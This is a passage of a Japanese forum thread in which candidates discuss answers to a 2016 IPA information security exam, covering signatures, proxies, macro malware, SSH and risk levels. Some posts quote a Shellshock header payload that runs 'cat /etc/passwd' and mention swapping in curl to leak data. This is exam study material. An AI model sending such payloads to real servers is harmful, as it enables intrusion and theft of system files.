それからイメージファイルの作成/更新処理、たぶん○もらえるだろうけど、
ファイル→ハッシュ→署名っていう流れを意識してほしいね
問2設問4(1)、strcpy()のバッファオーバラン防ぐライブラリって実在するの?よくわからん
278 :
名無し検定1級さん
2016/10/19(水) 01:34:06.87 ID:0rh15364
>>273 解答中に気になったんだけど、LTE機器の仕様が不透明過ぎて困ったんよね。
実務で扱う機械なら、暗号化と復号の機能が積まれてるかもしれないけど、
この試験で登場した機械には一切言及がないし。
279 :
名無し検定1級さん
2016/10/19(水) 01:34:09.88 ID:6rnTMQO/
午後I 問3
フェーズ2はプロキシ1と2の並行設置期間 = 新プロキシ2のデグレ確認期間だよね。
1. とりあえず有効化
2. 業務に不要と思われるカテゴリ(X)を遮断 → 業務でデグレ発生
3. カテゴリ(X)を「検知」に格下げ、1か月放置 → 2.のうち業務で必要なURL(Y)がわかる
↓
・URL(Y)はホワイトリストに乗せる
・カテゴリ(X)は当初目論見通り遮断に戻す
280 :
名無し検定1級さん
2016/10/19(水) 01:38:12.69 ID:zxoJFYat
>>279 それも会社次第だからなあ
検索サイト以外全遮断、申請上がったものを順次ホワイトリストって厳しい会社も山ほどあるし
281 :
名無し検定1級さん
2016/10/19(水) 01:41:01.36 ID:6rnTMQO/
>>280 現実世界では会社次第。おれは本問のQ社のことを書いてるよ。
282 :
名無し検定1級さん
2016/10/19(水) 01:43:37.09 ID:gmp7lwAs
283 :
名無し検定1級さん
2016/10/19(水) 01:45:57.74 ID:OSKr1V/C
>>277 これはそう思う
ファイルの改ざんチェックをどう実現するかなんだから
「ハッシュ」は必須キーワードだよな流石に
284 :
名無し検定1級さん
2016/10/19(水) 01:52:51.91 ID:0rh15364
Q社で思い出したが、問3の設問4の1の答えの根拠が
本文中には一切触れられてない手続きなんだが。
利用者I.D.やパスワードは、あくまでも管理用PCにログインするときの手続きで、
個人用PCで使うとは一言も書いてないし、
実際、専ブラを使うとか、ネットワーク内の端末は一律みとめるとか、色々なパターンがあるのに、なぜこのしけゆではI.D.とパスワードにしたんだろう。
285 :
名無し検定1級さん
2016/10/19(水) 01:54:38.73 ID:0rh15364
>>283 公開鍵と秘密鍵が必須項目で、ハッシュ値がその次に大事だよな。
てか、この大問唯一の古典的問題で焦つた。
286 :
名無し検定1級さん
2016/10/19(水) 02:00:09.60 ID:KFQGJsb2
>>283 ごめんね、ちょっと違う
ここでのハッシュは秘密鍵での暗号化(署名作成)対象のデータサイズを小さくかつ固定長にしたいだけ
ハッシュ値は簡単に算出できるから、データ+そのハッシュを送っても改ざん対策にはならない
あくまで秘密鍵による署名がメインでハッシュはその前処理
>>285 そゆこと
287 :
名無し検定1級さん
2016/10/19(水) 02:03:00.80 ID:nrM9pnX9
288 :
名無し検定1級さん
2016/10/19(水) 02:06:02.70 ID:0rh15364
あー、見落としてた。認証手続きとは書いたけど、減点されたかな。
ところで、もう一つ疑問があるんだけど。問3の文中に「社員向けPCにはOS の管理用コマンドはインストールされてない」って書いてあるのに、起動停止の対象に入れてるのは何故?
入ってないものは起動しようがないと思うんだけど。
289 :
名無し検定1級さん
2016/10/19(水) 02:08:46.47 ID:1Gf7znoq
勝手にcygwinとか入れる社員がいるから(ごめんなさい)
290 :
名無し検定1級さん
2016/10/19(水) 02:13:19.01 ID:uQOHbSaR
文書マクロの起動を禁止する設定って可能なのでは?
https://goo.gl/QWeMYv 問題文の流れなら、禁止する設定が可能かつ業務に影響がなければとりあえず禁止設定をする流れなので、
マルウェアZも禁止設定に含めた回答を書いた(´・ω・`)
現実にはMS Officeの場合はマルウェアZを含む安全が確認できていない
マクロの起動を禁止する設定をすることになるけど、
ほっとくと危なくて起動禁止が可能なのだから起動禁止に1票。
問題は、IPA的に文書マクロをプログラムと呼ぶか呼ばないか次第なのではないかと。
291 :
名無し検定1級さん
2016/10/19(水) 02:23:20.75 ID:0rh15364
>>290 オフィスファイルのマクロを止めるセキュリティソフトは存在するよ。
さっきも書いたけど、マクロ付き文書ファイルは画像とかマクロを内包してるから、個別にハッシュ値をとって、問題があれば削除したり停止したりすることができるし、そういう機能が大手のセキュリティソフトには入ってる。
292 :
名無し検定1級さん
2016/10/19(水) 02:28:34.34 ID:QVuLLXLl
293 :
名無し検定1級さん
2016/10/19(水) 02:28:37.66 ID:nrM9pnX9
>>290 .docxとか.xlsxをプログラムだと思ってる人は少ないだろうなぁ
記述じゃなくて選択だからIPA的には明確な正解があるんだろうね
個人的にはマルウェアZを含めない方が問題文との整合性がとれてると思う
俺はウカを選んだけど
294 :
名無し検定1級さん
2016/10/19(水) 02:30:51.70 ID:OKo5TNVI
実際どうあがいてもイオだと思う
俺もウカを選んだけど
295 :
名無し検定1級さん
2016/10/19(水) 02:30:57.21 ID:ICoaEW18
ここのみなさんは解答例に対してどうかなと思ったけど、やっぱり意見が割れてるんですね…。
自分は午前1を厳し目に採点したら50点ぐらいだったんで怖くて仕方ないです…。
記述のところってどこまで拾われるんだろう。
296 :
名無し検定1級さん
2016/10/19(水) 02:34:04.76 ID:BNwzo7vZ
>>277 同意
同じ考えの人が居て安心した
現実だとmd5コマンドでのハッシュ値を公開してダウンロード側に検証させるんだから、この問の場合は公開したファームウェアのハッシュ値を秘密鍵で署名、にしてほしい。ファイルサイズ的に考えて。
297 :
名無し検定1級さん
2016/10/19(水) 02:35:52.88 ID:1Gf7znoq
MS OfficeをVBAマクロの実行環境とはとらえられないよね…
俺もウカを選んだけど
298 :
名無し検定1級さん
2016/10/19(水) 02:45:13.94 ID:9tA4wSTc
ホスト鍵ってフィンガープリントのことなのか…
普通にパスワード的なものだと思ってた
299 :
名無し検定1級さん
2016/10/19(水) 02:45:17.20 ID:QVuLLXLl
>>295 割れてると言うか、低得点者がギャーギャー言って論破されてるのを認めてないだけだぞ
300 :
名無し検定1級さん
2016/10/19(水) 02:56:19.11 ID:ICoaEW18
>>299 正直、最終的にはIPAが正しい、というとこだから、色々言いたくなるのはわからなくもないです。
俺も色々言いたい…。
まあ、「試験結果に問題の難易差が認められた場合には,基準点の変更を行うことがあります。」って試験案内に明記されてるし、きっと調整が入るでしょう、と勝手な予想。
というか、そうであって欲しい…。
301 :
名無し検定1級さん
2016/10/19(水) 03:05:27.62 ID:6rnTMQO/
午後II 問2
設問5は知能テストでつらかった。
・修正案は以下の通り
−−−−−−
(図4表1)
高 低
低 低
↓ 改善後: 重要度「中」ができた
(図10表1)
高 中
中 低
−−−−−−
−−−−−−
(図4表3)
3 2
2 1
↓ 改善後: 増えた重要度「中」の中央列だけが追加された
(図10表3)
3 注 2
2 1 1
−−−−−−
・Q主任の当初修正案では
図4表3のうち 1と3は対処確定 = 手動での評価が不要
かたや2は手動での評価が必要
↓ F氏の指摘
★Q主任の修正案(図9-4.)は没になった
図10表3のうち 1と2と3は対処確定 = 手動での評価が不要
かたや「注」は手動での評価が必要
(2) 図4表3で 2 だったやつ
(3) 「注」の手動での評価基準 …おれは注の定義書いちゃったから間違い
302 :
名無し検定1級さん
2016/10/19(水) 03:46:08.50 ID:hq+qNUTL
もう一回勉強とか嫌だからなんとかしてくれ
303 :
名無し検定1級さん
2016/10/19(水) 03:52:55.30 ID:nrM9pnX9
>>299 問題文に曖昧性があるのは事実だけどな
午後2問2の最後はもっと酷いし
304 :
名無し検定1級さん
2016/10/19(水) 04:07:46.26 ID:6rnTMQO/
午後II 問2 の最後設問5 は(1)(2)がSCの知識全く必要ないSPIみたいなパズルで、
膨大な時間使わされたし、疲弊しきって(3)もパズルから読むのかと思って間違えた。。。
305 :
名無し検定1級さん
2016/10/19(水) 04:44:40.16 ID:BNwzo7vZ
技術依存の題材でも文句は出るし、コストとセキュリティの最適バーターの算出でも文句は出る
実務では普通にどっちの能力も要るから、まるでわかんないって人がいたらもっと頑張った方がいい
306 :
名無し検定1級さん
2016/10/19(水) 05:29:19.52 ID:WplMb5HJ
午前1は18問正解なら60点?
307 :
名無し検定1級さん
2016/10/19(水) 06:15:40.33 ID:/LERWDoz
>>301 「リスクレベルの評価」は必ず行うので、一つも選ばないのが正解…
問題文における用語は正確に使い分けて欲しかった。。。
308 :
名無し検定1級さん
2016/10/19(水) 06:20:53.14 ID:TFwFOBed
アホスタマンよ、結果は?
309 :
名無し検定1級さん
2016/10/19(水) 06:33:09.94 ID:/LERWDoz
>>270 ありがとうございます。バッチリ書いてありましたね。
310 :
名無し検定1級さん
2016/10/19(水) 06:43:38.19 ID:joeXOCD3
午後2の問2のヘッダ名を答えるやつ、HTTPで部分点貰えないかなぁ…
311 :
名無し検定1級さん
2016/10/19(水) 07:04:54.41 ID:YWo3etMU
itec 問1cはz1.z2.z3.z4 じゃないの?
送信元でしょ
312 :
名無し検定1級さん
2016/10/19(水) 07:06:35.85 ID:csU/UrKG
書けるだけ書いたから部分点に期待
313 :
名無し検定1級さん
2016/10/19(水) 07:11:32.42 ID:USIejMg9
まあまあ議論したところで結論なんて出ないしIPAの解答発表を待とうぜ?
314 :
名無し検定1級さん
2016/10/19(水) 07:20:55.86 ID:AVsaHRBv
どうやら今回は合格率が10%ぐらいみたいだな
前回のSGは合格率が90%でも調整しなかったから
調整には期待できないかも
315 :
名無し検定1級さん
2016/10/19(水) 07:23:05.17 ID:d8m8qUls
316 :
名無し検定1級さん
2016/10/19(水) 07:23:17.23 ID:URIWJZcd
>>259 書いても減点されないだけで0点だと思う
317 :
名無し検定1級さん
2016/10/19(水) 07:24:28.18 ID:fC21Dlb1
モテる男はつらいものだ
オレにも覚えがある
318 :
名無し検定1級さん
2016/10/19(水) 07:25:11.86 ID:n5fcDmc1
国語ガーと文句言うと
ぎじゅちゅよりでも文句言う
単に簡単な高度だからとなめてるだけ
319 :
名無し検定1級さん
2016/10/19(水) 07:26:04.66 ID:0rh15364
>>311 z1z2z3z4は送信先のグローバルIPアドレスだから間違いないよ。
実際、SMTPの発信元もそこだから、内部の危機じゃなきゃ辻褄が合わない。
320 :
名無し検定1級さん
2016/10/19(水) 07:34:03.97 ID:VDtqZDaH
グローバルipアドレスの末尾の2桁の数字書いてたらダメかな??
321 :
名無し検定1級さん
2016/10/19(水) 07:36:12.15 ID:MZ2QJ7uF
>>288 マルウエアに感染したら勝手にダウンロードされて実行されてしまうからでしょ
322 :
名無し検定1級さん
2016/10/19(水) 07:39:41.08 ID:e+2VzxG4
2桁の数字…
まさかあの数字の意味が分からぬと申すのか?
323 :
名無し検定1級さん
2016/10/19(水) 07:41:18.85 ID:USIejMg9
あれは年齢だよ
324 :
名無し検定1級さん
2016/10/19(水) 07:41:25.83 ID:MZ2QJ7uF
>>320 ポート番号はIPアドレスには含まれないね
部分点もらえるかどうかは不明
325 :
名無し検定1級さん
2016/10/19(水) 07:41:31.62 ID:Gai3Yx9s
:22や:25のことを言ってるのなら、これは勉強不足としか言いようがない。
326 :
名無し検定1級さん
2016/10/19(水) 07:50:52.46 ID:uGUbe8YO
327 :
名無し検定1級さん
2016/10/19(水) 07:55:05.29 ID:5nW17lEu
>>293 それはプログラムでいいけど、
名前でもハッシュでも禁止無理じゃね?
328 :
名無し検定1級さん
2016/10/19(水) 08:02:42.25 ID:USIejMg9
329 :
名無し検定1級さん
2016/10/19(水) 08:05:08.48 ID:uGUbe8YO
俺もウカて書いたけど
流石に往生際悪すぎ
330 :
(*´∀`)情弱士
2016/10/19(水) 08:21:15.34 ID:f2/TZgVF
331 :
(*´∀`)情弱士
2016/10/19(水) 08:26:04.93 ID:f2/TZgVF
332 :
名無し検定1級さん
2016/10/19(水) 08:26:06.56 ID:zlrB+9Dl
>>328 このまんまやな
マルウェアz止めれんじゃんw
333 :
名無し検定1級さん
2016/10/19(水) 08:35:04.05 ID:USIejMg9
マルウェアZを含む文書ファイルをマルウェアZというかどうか
334 :
(*´∀`)情弱士
2016/10/19(水) 08:40:51.03 ID:f2/TZgVF
>>301 LANに繋がっていれば、重要情報は流出するって判断すると i=高。
重要度レベル中とは、社外からアクセスできない、つまり、RD-LANの問題のような孤立したLANだと思う。
335 :
名無し検定1級さん
2016/10/19(水) 08:44:24.50 ID:USIejMg9
情弱士のおっさん仕事してねーの?
336 :
(*´∀`)情弱士
2016/10/19(水) 08:45:43.54 ID:f2/TZgVF
>>335 40歳定年説を実行中。6年間、貯金崩して暮らしてる。
337 :
名無し検定1級さん
2016/10/19(水) 08:45:52.25 ID:QrbUd/WC
338 :
名無し検定1級さん
2016/10/19(水) 08:45:52.27 ID:glCV36Qw
午後2の最後の方
重要データを持たない外部公開サーバの重要度は低のままだと思うんだけどなー。
問題文に書かれた事象からは、この部分の重要度を変更しなければならない理由が見当たらない。
339 :
名無し検定1級さん
2016/10/19(水) 08:49:27.26 ID:USIejMg9
340 :
名無し検定1級さん
2016/10/19(水) 08:49:49.29 ID:zlrB+9Dl
調べてると、マクロを利用した不正プログラムは、マクロ内で別のプログラムを実行して攻撃用プログラムをダウンロードする
はじめにマクロ内で実行するプログラムをマルウェアzとするなら、起動禁止は可能
文書ファイル全体(マクロ含む)をマルウェアzとするなら起動禁止は微妙
問題文は「マルウェアzは、文書ファイルのマクロとして実装されていた。」となっているから、後者ぽいけど、IPA言語難しくて分からない
341 :
名無し検定1級さん
2016/10/19(水) 08:51:43.67 ID:F+nDC8/Y
>>338 この問題でひたすらwebサーバが改竄される恐れって話でてるやん
外部に公開してるんだから対策しないと業務に支障でるよ
342 :
(*´∀`)情弱士
2016/10/19(水) 08:52:41.82 ID:f2/TZgVF
>>339 1800万くらいかな。たぶん、働かなくて年金生活の頃にはで実家の畑で土いじり。
でも、これだと人生つまらんから、力試し(資格取得)と、運だめし(仕事探し)をしようと思った。
343 :
名無し検定1級さん
2016/10/19(水) 08:56:21.56 ID:glCV36Qw
マルウェアZは含まれない、が正解だな。
そもそもマクロ自体は実行ファイルではないし、同一ファイルによる被害の拡散を抑えるのであれば、文書ファイル自体を起動禁止とすべきだよね。
もう少し冷静に考えるべきだった。
でも他の問題で点数稼げたから大丈夫なはず。
344 :
(*´∀`)情弱士
2016/10/19(水) 09:15:20.54 ID:f2/TZgVF
午後U問2の図10は、
事象(重要情報の有無)と状態(社外アクセス有無)が異なってるのに、
どうしてi=中として対処を同じにできるのか?
そこが不思議なんだけどなぁ・・。
345 :
名無し検定1級さん
2016/10/19(水) 09:34:03.02 ID:g9ttRCku
午後1の問1にあるsshの改善案
証明書を用いるものに変えるは完全に0点かな
部分点欲しいお
346 :
名無し検定1級さん
2016/10/19(水) 09:52:03.60 ID:0fmpPhDX
社内webなら下げてもいいけど
公開webは対策するでしょ
347 :
名無し検定1級さん
2016/10/19(水) 09:55:47.91 ID:d1TWyUq2
午後1 問3 設問2 イ、オ選択して52点で爆死w
またまた午後1で脂肪か
348 :
(*´∀`)情弱士
2016/10/19(水) 10:01:03.26 ID:f2/TZgVF
>>344 22ページの真ん中辺りに、
CVSS値で判断するな、重要情報は洩れるから対策するんだ。
というP部長の判断が書いてある。
i=中にした場合、中は重要度レベルの条件表は考慮しなくていいことになるのに、中の定義が無意味になる。=不正解。
i=高にした場合、中の重要度レベルの条件が一意だから、CVSSの値で振り分ける事は意味があるだろう。=正解。
349 :
(*´∀`)情弱士
2016/10/19(水) 10:06:51.68 ID:f2/TZgVF
>>348 訂正。
22ページの真ん中辺りに、
重要情報は洩れるから対策するんだ。
というP部長の判断が書いてある。
350 :
(*´∀`)情弱士
2016/10/19(水) 10:30:47.65 ID:f2/TZgVF
>>348 P部長の思いを書いておく。
社外からアクセスできるところに脆弱性があるなんて、不安でしょう。だからi=高で経過を見守ることはしない。
重要度レベル中は、社外アクセスできない重要情報。
注1は、Y脆弱性みたいな事で重要情報が漏洩するという場合は、リスクレベル3で直ちに対応する。
351 :
名無し検定1級さん
2016/10/19(水) 10:40:10.99 ID:USIejMg9
>>34 1800万かー今46か
慎ましく暮らしても年金まで持ちこたえられるか?
それでも土地あるっていいなー
俺も土いじりしてほのぼの暮らしたくなるときがあるよ
352 :
(*´∀`)情弱士
2016/10/19(水) 10:52:21.37 ID:f2/TZgVF
>>351 車持っていても年間120万円くらいの生活費。
土いじり、というより実家は兼業農家だった。
桑畑作って蚕飼ってみたり、納屋には牛が居たり、台所はかまども有るし、井戸の中には魚が2匹いて飲み水に使っていたり。
353 :
名無し検定1級さん
2016/10/19(水) 10:58:39.45 ID:0fmpPhDX
年金まで持つのかと言うのはともかく
いい生活だな
354 :
名無し検定1級さん
2016/10/19(水) 11:01:14.45 ID:USIejMg9
>>352 月10万しか使わないのか
それはそれですごいな
魚がいる井戸はどうかと思うけど(笑)かまどはいいな
個人的には囲炉裏が好き
355 :
名無し検定1級さん
2016/10/19(水) 11:20:07.16 ID:dG1MRBRH
>>342 てことは40時点で2500万くらいあったのか
俺も金使わないし真似ようかな
356 :
名無し検定1級さん
2016/10/19(水) 11:55:11.93 ID:Qi/UBWGL
ふと気になって調べたら、一部の機器ではCA証明書やユーザー証明書を使ってssh接続の認証手続きをすることができるみたいだけど、試験としては不正解なのかなー
マイナー過ぎて認められない気もするが。
357 :
名無し検定1級さん
2016/10/19(水) 12:11:03.33 ID:0fmpPhDX
公開鍵て書いたけど、証明書も間違いとは言えない気がする
358 :
名無し検定1級さん
2016/10/19(水) 12:12:54.44 ID:BNwzo7vZ
>>338 「重要情報を扱っては居ないが社外からアクセスできる機器、社外からアクセスできないが重要情報を扱ってる機器も、場合によっては直ちに脆弱性に対応する必要がある」
重要情報を扱っては居ないが社外からアクセスできる機器は、図10の i の部分であり、ここを重要度レベル低にするとリスクレベルは2or1になる。
「直ちに脆弱性対策を実施する」のはリスクレベル3だけなので、i.低 は間違い。
359 :
名無し検定1級さん
2016/10/19(水) 12:16:04.43 ID:lt65wrvc
IPA「マクロは実行プログラムじゃないんだよバーーカ!!引っかかった奴マジざまあwww俺様の意図を理解しろよアスペ」
ぼく「でもそのマクロは文書ソフトという実行プログラムで実行されてしまうよね。現実見よ?」
IPA「うわあああああああああ(椅子から転げ落ちる)」
360 :
名無し検定1級さん
2016/10/19(水) 12:21:27.58 ID:NAW/Ec5G
糞問多いけど、エンベデッドには負けるな。
あっちは本当にエスパー系じゃないと解けないゴミ問題が多い。
361 :
名無し検定1級さん
2016/10/19(水) 12:25:40.78 ID:BNwzo7vZ
>>338 追記
重要情報を扱っては居ないが社外からアクセスできる機器がヤバいことになる本文中の事例は、まんま任意のシステムコールが使えるようになる部分で、これは問にもなってる。
問での事例はcatだったけど、これがcurlで社内webサーバの重要情報表示ページを表示するならば、重要情報が漏洩する。
362 :
名無し検定1級さん
2016/10/19(水) 12:30:47.06 ID:wwBDjKfz
>359
IPA「マルウェア対策は社員への注意喚起で対策済み。不正プログラムに該当しない文書ソフトの禁止で可用性を損ねることはしない。」
ってとこじゃね?俺はマルウェアも選択したけどさ
363 :
名無し検定1級さん
2016/10/19(水) 12:32:03.54 ID:NAW/Ec5G
IPAも2ch絶対見てるよね。
BYODで。
364 :
名無し検定1級さん
2016/10/19(水) 12:32:49.92 ID:hfK47pBp
注意換気で済むんならセキュリティ事故なんて起きないんだよなあ
365 :
名無し検定1級さん
2016/10/19(水) 12:33:32.21 ID:zlrB+9Dl
opensshの標準機能で証明書による認証対応してた
マイナー過ぎるし、部分点はどうなんだろねぇ
366 :
名無し検定1級さん
2016/10/19(水) 12:34:57.17 ID:wwBDjKfz
俺もそう思うけど暫定対策じゃないっけ?文書ソフトがどういう位置づけか迷ってマルウェアも選んだわ。
367 :
名無し検定1級さん
2016/10/19(水) 12:35:35.38 ID:hfK47pBp
マイナーというか、普通sshって証明書で入るもんでしよ
368 :
名無し検定1級さん
2016/10/19(水) 12:38:33.81 ID:XxHt8oh9
このスレで問題文をろくに読まない奴とか設問に関係ない自分の言いたいことだけ繰り返す奴とかを見てると、試験を通じて技術者にもっと日本語読解能力を求めるIPAの方針は間違ってないように思える
369 :
名無し検定1級さん
2016/10/19(水) 12:38:59.65 ID:ahPmlNeU
370 :
名無し検定1級さん
2016/10/19(水) 12:40:47.37 ID:lt65wrvc
わざと曖昧性を残してるんだろうな
この試験に適合するIPA人材を選別するために
まあガチで作って糞問題になってる可能性も大いにあるが
371 :
名無し検定1級さん
2016/10/19(水) 12:40:57.19 ID:7+2t/9Ve
372 :
名無し検定1級さん
2016/10/19(水) 12:45:14.57 ID:uQOHbSaR
373 :
名無し検定1級さん
2016/10/19(水) 12:49:10.94 ID:8ATGOb2v
やっぱりウ、カが正解だよね♪
374 :
名無し検定1級さん
2016/10/19(水) 12:50:11.65 ID:8Lb5mJPM
IPA言語ガーとか言っちゃうやつは、ちょっとだけでも自分の日本語読解力のなさと向き合うべきだとは思う。
375 :
名無し検定1級さん
2016/10/19(水) 12:51:07.47 ID:BNwzo7vZ
>>372 > 添付ファイル名称
> @『10280.doc』
> A『2610-099189.doc』
> B『2F4A8C1B-9DB6-4749-AA9C-9ED67A419132-574-IF.doc』
民間「この添付ファイル名を実行禁止リストに登録しとけばより安全になるな!IPAさん感謝!」
…てことか。
376 :
名無し検定1級さん
2016/10/19(水) 12:52:23.74 ID:F+nDC8/Y
>>367 普通はパスワードか公開鍵認証でしょ
どっかのCA利用してるの?利用料かかるだろうしsshの為によくそこまでやるな
>>368 わかる
今回初めて受けてここ来たけど、まず日本語とコミュニケーション能力上げた方がいいやつ大杉
377 :
名無し検定1級さん
2016/10/19(水) 12:53:58.48 ID:lt65wrvc
すげえ攻撃的なやつだな。こわい
378 :
(*´∀`)情弱士
2016/10/19(水) 12:54:45.95 ID:f2/TZgVF
379 :
名無し検定1級さん
2016/10/19(水) 12:55:21.23 ID:zxoJFYat
>>374 ITに詳しい者ほどよく効くメダパニだな
お前には効かん
380 :
名無し検定1級さん
2016/10/19(水) 12:56:53.85 ID:lt65wrvc
381 :
名無し検定1級さん
2016/10/19(水) 12:59:13.35 ID:lt65wrvc
まあ参考書も過去問の用語ではーと無理やり説明してるからな
合格したけりゃIPAの顔色をうかがうのはマストだよ
382 :
名無し検定1級さん
2016/10/19(水) 13:01:05.42 ID:8Lb5mJPM
>>379 >>280 を見て君にアドバイスする。
もっと物事のスコープを意識してみてくれ。この業界で金稼げるようになれないよ。
383 :
名無し検定1級さん
2016/10/19(水) 13:02:23.94 ID:Qi/UBWGL
>>376 CAの公開鍵を使う手もあるし、別に証明書発行用のサーバを建てる手もあるよ。
あと、ユーザー証明書だと認証できる相手を一気に絞れるメリットもあるらしい。
384 :
名無し検定1級さん
2016/10/19(水) 13:02:42.14 ID:BNwzo7vZ
だねえ
どっちが正解でも構わんけどIPAの見解が知りたい、て感じやな
今回の楽な午後1問3でマルウェア解釈によって合否が分かれる人達は、まぁ問題に文句つけるとは別にやれることがあるわな
385 :
(*´∀`)情弱士
2016/10/19(水) 13:02:45.91 ID:f2/TZgVF
386 :
名無し検定1級さん
2016/10/19(水) 13:12:17.88 ID:Hj1jPdUP
>>374 日本語読解力のある君にぜひ午後2問2の最後の問題の答えを教えて欲しい
387 :
(*´∀`)情弱士
2016/10/19(水) 13:13:35.72 ID:f2/TZgVF
>>372 対策
ファイルを開いた際にマクロを自動的に有効にするような設定は行わないことと、安全性が不明なファイルではマクロを有効化しないことを推奨します。
(゚ω゚)やっぱ、ツール→マクロ→セキュリティ だろ。
388 :
名無し検定1級さん
2016/10/19(水) 13:15:09.57 ID:0fmpPhDX
389 :
名無し検定1級さん
2016/10/19(水) 13:17:45.70 ID:/Tls1sa1
作成時と更新時って送る側の処理と思ったんだけど
送る側か受け取る側かどっちかはっきりする聞き方してくれないとわからない
390 :
374
2016/10/19(水) 13:22:50.77 ID:8Lb5mJPM
391 :
名無し検定1級さん
2016/10/19(水) 13:24:09.09 ID:bnKZMeNM
午後2解答出たぞ。
392 :
名無し検定1級さん
2016/10/19(水) 13:35:30.23 ID:0fmpPhDX
速報見たけど
どう低く見積もっても
午後2-2は7割行った
393 :
(*´∀`)情弱士
2016/10/19(水) 13:36:13.79 ID:f2/TZgVF
394 :
名無し検定1級さん
2016/10/19(水) 13:37:46.99 ID:4o5BBQQW
こりゃ受かったな
395 :
名無し検定1級さん
2016/10/19(水) 13:39:36.58 ID:USIejMg9
午後1 8割
午後2 7割
ハイパー配点調整で逆風食らわなければ通ったな
396 :
名無し検定1級さん
2016/10/19(水) 13:40:04.93 ID:OKo5TNVI
くそ微妙
だれか配点予想よろ
397 :
名無し検定1級さん
2016/10/19(水) 13:41:26.27 ID:BNwzo7vZ
午後2問2設問5(3) iTEC回答
j: 公開Webサーバの改ざん
k: 社内Webサーバの情報の窃取
となりました。
398 :
名無し検定1級さん
2016/10/19(水) 13:43:29.63 ID:kazX5M5T
399 :
名無し検定1級さん
2016/10/19(水) 13:48:02.95 ID:OKo5TNVI
問1-2-3の失効事由の値ってア(affiliationChanged)は入らんの?
アウにしたんだけど、また全て選べ問題で答え一つだけかよ・・・
今までこんなことあったか?
400 :
名無し検定1級さん
2016/10/19(水) 13:49:25.99 ID:8ATGOb2v
55点ぐらいだな
不合格ですありがとうございます
401 :
(*´∀`)情弱士
2016/10/19(水) 13:51:21.55 ID:f2/TZgVF
記号は一個10点であってほしい。。採点が楽でしょ?
402 :
名無し検定1級さん 転載ダメ©2ch.net
2016/10/19(水) 13:51:56.81 ID:JDz1EnDM
解説のpdf、削除された?リンク青文字じゃ無くなってるんだけど。、。
403 :
名無し検定1級さん
2016/10/19(水) 13:52:07.61 ID:NAW/Ec5G
だめだ、午後2で落ちた
404 :
名無し検定1級さん
2016/10/19(水) 13:57:06.22 ID:0fmpPhDX
問題は午後1-1だな
405 :
名無し検定1級さん
2016/10/19(水) 13:58:36.60 ID:4o5BBQQW
時間内に午後2両方解いたけど、どっちでも受かってそうで笑える
406 :
名無し検定1級さん
2016/10/19(水) 14:03:51.17 ID:6jZvxIH3
午後2問2全然違う回答でワロタ
良くても40点くらいだわ
407 :
名無し検定1級さん
2016/10/19(水) 14:04:30.50 ID:0fmpPhDX
408 :
名無し検定1級さん
2016/10/19(水) 14:07:45.60 ID:BNwzo7vZ
j: 公開Webサーバの改ざん
「Y脆弱性が悪用されると公開Webサーバが改ざんされるおそれがあり、(略)」と書かれてるから、正解だな。
k: 社内Webサーバの情報の窃取 (14文字)
この内容をリスクレベル3にするってことは、社外からアクセスできないサーバの情報の漏洩について一律リスクレベル3にする、てことになると思うんだが…
出題中では重要度レベル中になるのは重要情報を扱ってないサーバに限られるし、微妙な気がする。
けど「重要情報」にしたら16文字か。一応正解でいいのかな。
409 :
(*´∀`)情弱士
2016/10/19(水) 14:11:43.85 ID:f2/TZgVF
どちらが企業にダメージを多く与えるか?だな。
17ページ「(以下、重要情報)」が漏洩
18ページ「公開Webサーバが改ざん」
410 :
名無し検定1級さん
2016/10/19(水) 14:17:45.93 ID:0fmpPhDX
>>385 シグネチャ回避はあくまでジャンクコードの話だね
まず今回の問題でシグネチャ検出はしない気もするけど
411 :
名無し検定1級さん
2016/10/19(水) 14:21:32.14 ID:aMF8R1a9
午後2問2設問2(4)の
() {echo test;}; /usr/bin/cat /etc/passwd
って問題文そのままじゃん
何のために出題したの?
412 :
名無し検定1級さん
2016/10/19(水) 14:21:36.77 ID:BNwzo7vZ
kについては、俺は確か
社内機器の重要情報の漏洩 (12文字)
て書いた。
脆弱性対策基準においてはWebサーバに限定する必要は無いと思ったので。
俺は記号問題は全部合ってるから、文章回答が部分点全部ゼロみたいなことにならない限り合格だろうけど、IPAの見解と民間業者の見解の差異があるなら、やっぱ気になる。
413 :
(*´∀`)情弱士
2016/10/19(水) 14:24:41.23 ID:f2/TZgVF
本問ではWebサーバの脆弱性を題材に、秘密管理されている個人情報の重要性を問う。
414 :
名無し検定1級さん
2016/10/19(水) 14:25:12.85 ID:BNwzo7vZ
>>411 「えっサンプルのまんまだけどマジでこれでいいの?」という心の強さを試すため(適当)
空関数の実行可否について思い至れば、確実に実行できることが保証される「echo test」を削ることはしない……てことだと思う。
クソ問題であることに異論は無い。
415 :
名無し検定1級さん
2016/10/19(水) 14:33:02.55 ID:Qi/UBWGL
午後2はなんとか6割だわ。
個人的には問1の最終問題だけが気になる。
置き忘れや不正の抑止を、検知の側から書くのはダメなんかな?
確か、この手のカードを使う会社は短時間に何度も出入りする人とかを監視する手段に使ってるし。
416 :
名無し検定1級さん
2016/10/19(水) 14:49:38.12 ID:BNwzo7vZ
417 :
(*´∀`)情弱士
2016/10/19(水) 14:56:37.61 ID:f2/TZgVF
午後U試験
問2
問2では、近年あったShellShock脆弱性を題材に、個人情報漏洩対策を出題した。
全体としては正答率は高かった。
(途中は省略。各自想像してね)
設問5では、企業のBCPにも盛り込むべき個人情報漏洩の重要性を認識していないような回答が散見された。
418 :
名無し検定1級さん
2016/10/19(水) 15:01:09.92 ID:sc2cs4Q2
419 :
(*´∀`)情弱士
2016/10/19(水) 15:01:11.88 ID:f2/TZgVF
搾取されるから暗号化しておけよ。という事が言いたいのだろうけど・・・。
420 :
名無し検定1級さん
2016/10/19(水) 15:09:40.44 ID:1B13c+A/
午後Uは結構いけてる。
そんな時に限って午後Tで終わったけど。
421 :
(*´∀`)情弱士
2016/10/19(水) 15:33:49.77 ID:f2/TZgVF
>>414 '(){/usr/bin/cat /etc/passwd} '
シングルクォートで囲った俺は間違いだろうなぁ・・・。おわた
422 :
名無し検定1級さん
2016/10/19(水) 15:40:06.34 ID:I7apAtvw
できてる、って人が多いと調整食らいそうな気がする。
午後2は問1と問2どっちが難しかっただろう。
同じくらい?
423 :
(*´∀`)情弱士
2016/10/19(水) 15:42:16.20 ID:f2/TZgVF
>>421 Shellでは、
シングルクォートはそのままの文字に評価されるけど、
ダブルクォートは、変数の値や実行結果に置き換わってしまう。
HTTPヘッダーフィールドの値は、:と空白の次に書いてあるし、
シングルクォートを囲むべきか、囲まないべきか、迷ったのが最大の敗因だろうな。
424 :
名無し検定1級さん
